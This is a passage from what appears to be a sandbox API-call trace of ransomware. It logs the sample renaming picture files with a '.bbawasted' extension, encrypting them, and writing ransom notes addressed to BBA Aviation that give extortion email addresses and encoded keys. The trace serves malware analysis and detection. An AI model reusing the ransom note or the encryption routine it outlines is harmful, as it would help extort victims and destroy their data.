returned 0x6adb18 [0226.346] lstrcpyW (in: lpString1=0x6adb6a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0226.346] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0226.346] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a62c8) returned 1 [0226.347] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0226.347] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0226.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\DClE9hLj.gif.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\dcle9hlj.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0226.348] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0226.349] SetEndOfFile (hFile=0x290) returned 1 [0226.349] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0226.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0226.349] lstrcpyW (in: lpString1=0x6adb6a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0226.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\DClE9hLj.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\dcle9hlj.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\DClE9hLj.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\dcle9hlj.gif.bbawasted")) returned 1 [0226.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\DClE9hLj.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\dcle9hlj.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0226.352] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0226.352] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1263b [0226.352] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1263b) returned 0x5f0000 [0226.352] CloseHandle (hObject=0x27c) returned 1 [0226.355] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0226.356] CloseHandle (hObject=0x294) returned 1 [0226.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0226.356] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6460) returned 1 [0226.356] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0226.356] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0226.357] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6bd0) returned 1 [0226.357] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0226.357] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0226.368] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0226.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0226.368] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0226.368] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]XhnFEvhpD2nVJOf6D1sFCC+50DzbJ92sOCvcc4ZTSmgkMBgaHsFQqU2Bf146e3NZ\r\noWrWNkszYgEZqwnpHZE9WH3LiQE0WC7z1wxTUePAZnNOb0j8jgnsgUPiil+P7FYf\r\nvg+nh6vheAHJswMWe9Pr+j+C/ayuDXzdY0ddoBITKSCXYl9jfFBAhiGgWyKnIvX0\r\nprQbYkBIZizRHULFYZ1ZzIBoTtaMqaKoCtsng7DWF6HPZwcXTGdtlFkBx2qpzmW+\r\n2vD9IqdI7r7om+Jcjpc/c/cBAbEbH41gqzN8fYxorqsBHVbpcGKai3tpQeiL8FHN\r\ndyFJ/OMFSRyJBQgAqsnWI6r/Sl9DwHyZf9iuH8FJqZVdhF1pg3iYrPPKcQ0wweSi\r\n/Cg8M3H37VVQQQj5w4FMb13wt2zM0SaJrE8EzErkzL6wfQGuRirFFButASRWqEDc\r\niffKd4vOIj8GcJgs/WvIjKe7Mk5DQ5A7WbuwYzruZMqToHoM3dtK8IjghulH2J6N\r\nTIRu6ouDrMbWTpoDLJoBzwzC5pPD4Fj8MUi9TPig16PRXd61t33r9L6Ot+2g4sdy\r\ntWyvha+WVZl4Pvzv5pNFbV+Q76VMXakKaAeqVbYzgQyma/0L7o4Lt0PjQlkUIhYl\r\n8I5ly77bZUbsY3K9tBaZxQ/bEpyKrdgbcyJke0wQj14=[end_key]\r\nKEEP IT\r\n") returned 984 [0226.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0226.368] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0226.369] SetEndOfFile (hFile=0x290) returned 1 [0226.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0226.371] CloseHandle (hObject=0x290) returned 1 [0226.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0226.372] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a4828 | out: hHeap=0x660000) returned 1 [0226.372] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6ac0) returned 1 [0226.373] CryptGenRandom (in: hProv=0x6a6ac0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0226.373] CryptReleaseContext (hProv=0x6a6ac0, dwFlags=0x0) returned 1 [0226.373] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\hWP_-.jpg") returned 38 [0226.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x256) returned 0x6adb18 [0226.373] lstrcpyW (in: lpString1=0x6adb64, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0226.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0226.373] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6680) returned 1 [0226.374] CryptGenRandom (in: hProv=0x6a6680, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0226.374] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0226.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\hWP_-.jpg.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\hwp_-.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0226.891] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0226.893] SetEndOfFile (hFile=0x290) returned 1 [0226.893] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0226.893] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0226.893] lstrcpyW (in: lpString1=0x6adb64, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0226.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\hWP_-.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\hwp_-.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\hWP_-.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\hwp_-.jpg.bbawasted")) returned 1 [0226.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\hWP_-.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\hwp_-.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0226.894] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0226.895] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x18fec [0226.895] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18fec) returned 0x5f0000 [0226.895] CloseHandle (hObject=0x294) returned 1 [0226.898] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0226.900] CloseHandle (hObject=0x27c) returned 1 [0226.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0226.900] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6020) returned 1 [0226.901] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0226.901] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0226.901] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a69b0) returned 1 [0226.901] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0226.901] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0226.912] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0226.913] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0226.913] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0226.913] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]P5uA2vTdsBc4EUwviWCoyI4tbZjPL4OQgD4zjoV5d2EwRNfym9JodK4HyeYSPkrH\r\nKNV7/FuDaY5oTnnUoYFP/Ovc+2luCBZtVceG30tmoIKWM1VKzjlkmfuLIQ+uHy8j\r\nNgfOUjsbiRKFM1n8ClJAIdEy+kgUKVqPKXiZsng59LKe6s799YmTQ2cRm6PYmpbd\r\neecPAVa02bMlCHNWHtF89qY8W/JPE689fmhURPrd7RSUcWzPq+FDec65GBAXUuA6\r\nBd6Z+AbLchjLllnrhjy95Ydt7XzxeyQb73vgWUhv/fi71uOkilmPlt2RH0Ls9tAj\r\nii8wlMOMoESjwkpec7BOjxVSdOwqH2vJmrSB17WJQATJQR7p8qWz2mVIKn3TV0al\r\niYL7J7F167QsSyPAxfpcPqPDKtUGu8R6zaiRci3hJmXrAtwk0QEg6Tsh+ozyqzvD\r\nuwuNXLNzf3X1uo1TwU9xab6Qi9r/tVzKd3kp6LziGjmV5YEJaQ/HDdUYSiik7fPN\r\nEExxCkcac9YgsmFoRsAvlX/b8k/KdeRMLfuJBESgtMRxJOWvJPGjcDwea+QKvtzi\r\nfj2SxsUYXWgssm/Pb6KrWHWBJNxqkUD2uNjOdZffLxY1XGK07LoLPlc+6LshvP5B\r\n/i739Qa5cckWv/5NAP/2o7miQ8QJLbsxpHJyv8VBYuh=[end_key]\r\nKEEP IT\r\n") returned 984 [0226.913] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0226.913] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0226.913] SetEndOfFile (hFile=0x290) returned 1 [0226.916] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0226.916] CloseHandle (hObject=0x290) returned 1 [0226.916] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0226.916] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b3d88 | out: hHeap=0x660000) returned 1 [0226.916] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a63d8) returned 1 [0226.917] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0226.917] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0226.917] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kuu-qE.png") returned 39 [0226.917] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6adb18 [0226.917] lstrcpyW (in: lpString1=0x6adb66, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0226.918] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0226.918] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a65f8) returned 1 [0226.918] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0226.918] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0226.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kuu-qE.png.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\kuu-qe.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0226.920] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0226.921] SetEndOfFile (hFile=0x290) returned 1 [0226.922] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0226.922] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0226.922] lstrcpyW (in: lpString1=0x6adb66, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0226.922] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kuu-qE.png" (normalized: "c:\\users\\fd1hvy\\pictures\\kuu-qe.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kuu-qE.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\kuu-qe.png.bbawasted")) returned 1 [0226.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kuu-qE.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\kuu-qe.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0226.923] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0226.924] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x18083 [0226.924] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18083) returned 0x5f0000 [0226.924] CloseHandle (hObject=0x27c) returned 1 [0226.927] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0226.928] CloseHandle (hObject=0x294) returned 1 [0226.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0226.929] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6c58) returned 1 [0226.929] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0226.929] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0226.930] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6350) returned 1 [0226.930] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0226.930] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0227.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0227.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0227.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0227.208] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]UxqLSy8z1kw+934g+LSkkRWvclx+hdHGheIA9hfriIkUXX6VZeb8cq3/K+4e/8z2\r\nT5iQE3eyVV/vkuRAQHxPP/xX8gM+DmOAAFS2tv5XaOMVD1iJ1XLuI8EcYK2d1F4Q\r\nSpGg1r64TNZRCVVYV4zMjUj4ozCF6MkFwcO4eDyPaXRJonnCY7DNbaNiY7/P5vJu\r\nKPtIjJ7ujdl7VgXWAUaNks6LezOG0uWefiw3004wTQL241nBdERFZx8/3mTzS8tx\r\nQBzwxQQYDxrkqnn2iPA84AipKprLBDP4CrNV0IpKiS7+2a6+iKNcy/Sg9tn2cr7e\r\ngxalKqEx7tMzNmJrjSvASq+j48OjxwejNNjIYm8+1cjA8Rwl0GbklMHNuO6iPfbn\r\nd49CAM+hCTqw5bwC7sPSMa8+6EgCsuTXOfRv0zhgOLx8kV1FfAXjIFbXYh49D0Ex\r\n0sm8vOO4fUzwKAG/JHDM6jmWMlmAnYgR0zu8Xv66MHlCDk+KIXJDPvDFm5gCFj9L\r\nJJUERdpKBnhuO6aTACaa5HMTZqHiy8+cwEJi+/5p1psYyQ4EWoLWX34DS83p897c\r\n2pjKP8yQIy+E+JgeXxwem3zoAWHTTMOnyL+792dnDeOE/BY7PiFmFV/NeOxWeism\r\nctU42UZvSfpvmS4yLqMxfmc+VJlyqe0qj1NxPapBpsd=[end_key]\r\nKEEP IT\r\n") returned 984 [0227.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0227.208] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0227.208] SetEndOfFile (hFile=0x290) returned 1 [0227.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0227.211] CloseHandle (hObject=0x290) returned 1 [0227.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0227.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b3ed8 | out: hHeap=0x660000) returned 1 [0227.212] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6460) returned 1 [0227.213] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0227.213] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0227.213] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\OKBgrXvHG76m.png") returned 45 [0227.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x264) returned 0x6adb18 [0227.213] lstrcpyW (in: lpString1=0x6adb72, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0227.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0227.213] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6020) returned 1 [0227.214] CryptGenRandom (in: hProv=0x6a6020, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0227.214] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0227.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\OKBgrXvHG76m.png.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\okbgrxvhg76m.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0227.215] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0227.216] SetEndOfFile (hFile=0x290) returned 1 [0227.216] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0227.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0227.216] lstrcpyW (in: lpString1=0x6adb72, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0227.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\OKBgrXvHG76m.png" (normalized: "c:\\users\\fd1hvy\\pictures\\okbgrxvhg76m.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\OKBgrXvHG76m.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\okbgrxvhg76m.png.bbawasted")) returned 1 [0227.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\OKBgrXvHG76m.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\okbgrxvhg76m.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0227.218] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0227.218] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xa4e0 [0227.218] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa4e0) returned 0x5f0000 [0227.218] CloseHandle 